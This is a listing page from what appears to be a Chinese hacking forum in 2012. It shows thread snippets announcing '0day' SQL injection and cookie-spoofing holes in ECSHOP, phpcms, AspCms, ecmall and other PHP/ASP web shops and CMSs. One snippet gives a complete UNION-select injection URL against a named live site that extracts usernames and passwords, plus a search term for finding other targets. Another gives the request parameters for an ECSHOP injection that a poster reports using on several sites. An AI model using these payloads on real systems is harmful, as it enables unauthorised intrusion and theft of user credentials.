Web安全

关于ECSHOP新的注入漏洞的分析
Web安全 回复48次

关于ECSHOP新的注入漏洞的分析

刚才看了版主大大发了EC新洞。测试了几个站都成功了,看帖子里有人说有些站没有province怎么办,然后我就去读一下代码,看看具体漏洞出在哪里找了一下,发现问题出现在lib_order.php这个文件里的function available_shipping_list($region_id_list)函数里function available_shipping_list($region_id_

2012-12-26 23:45 48 6044

建站之星最新0DAY

//xo 怎么检测版块发不了帖子 //xo我这个好人有删号危险 //压力之下 把藏在多年的day发出来建站之星最新0DAY //code by helenpublic function save_profile() { $user_info =@ ParamHolder::get('user', array());//获取数组 if (sizeof($user_info) <= 0) { $this->assign('js

2012-12-26 15:56 17 3929

T00ls庆祝圣诞礼物,ECSHOP全版本注入0day

感谢欠杀的黑盒把任意商品加入购物车在填写配送地址那一页,有地区选择flow.php?step=consignee&direct_shopping=1比如省选择安徽其中POST数据如下country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&m

2012-12-25 22:56 182 11854

phpcms v9 广告统计处(header头referer)注入

首发90sec,转过来凑个数,sb 360说是他发现的http://www.pcpop.com/doc/jsu/12/123491.shtml原帖在这儿,比他早一个月https://forum.90sec.org/thread-4388-1-1.html虽然不是啥大洞,找之前没参考phpcms其他洞的信息,找出来后,专门去搜了下,没有报道这个注入的,找了半天才发现老早以前有个报phpcm

2012-12-25 16:20 18 4439

AspCms_v1.5_20110517 SQL注射

好久没上土司了,上来一看发现在删号名单内.....也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。

2012-12-24 17:48 22 4687

CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。这是一个神级漏洞,体现了程序员的神逻辑。看代码admin/admin_check.php<?php$CD_Version='V1.0';$CD_Build='20100501';function admincheck($CD_Permission){if($_COOKIE<>''){$menuarr=explode(',',$_COOKIE);$adminlogined='F

2012-12-23 21:36 19 3550
ECShop_V2.7.3_GBK_release1106 注入 0day
Web安全 回复67次

ECShop_V2.7.3_GBK_release1106 注入 0day

C0deplay Team j8g看代码/* 修改个人资料的处理 */elseif ($action == 'act_edit_profile'){ include_once(ROOT_PATH . 'includes/lib_transaction.php'); $birthday = trim($_POST) .'-'. trim($_POST) .'-'. trim($_POST); $email = trim($_POST); $other = $msn = isset($_POST)

2012-12-21 21:42 67 6204
最土团购 注入 好久的了
Web安全 回复20次

最土团购 注入 好久的了

直接来代码,你们就知道了。代码不分析了。,今天好累呀!http://tao.mphone.cc/api/call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23关键字百度 Powered by ZuiTu

2012-12-21 16:52 20 4332
dedecmsv5.7 最新爆绝对路径
Web安全 回复34次

dedecmsv5.7 最新爆绝对路径

先上图吧!具体细节,看代码就知道了!哈哈,世界末日了!!!

2012-12-20 20:54 34 6859
ecmall2.3.0-0918-scgbk 注入
Web安全 回复2次

ecmall2.3.0-0918-scgbk 注入

function _get_conditions() { /* 搜索条件 */ $conditions = "1 = 1"; if (trim($_GET)) { $str = "LIKE '%" . trim($_GET) . "%'"; $conditions .= " AND (goods_name {$str} OR brand {$str} OR cate_name {$str})";echo $conditions;exit;

2012-12-20 17:33 2 2686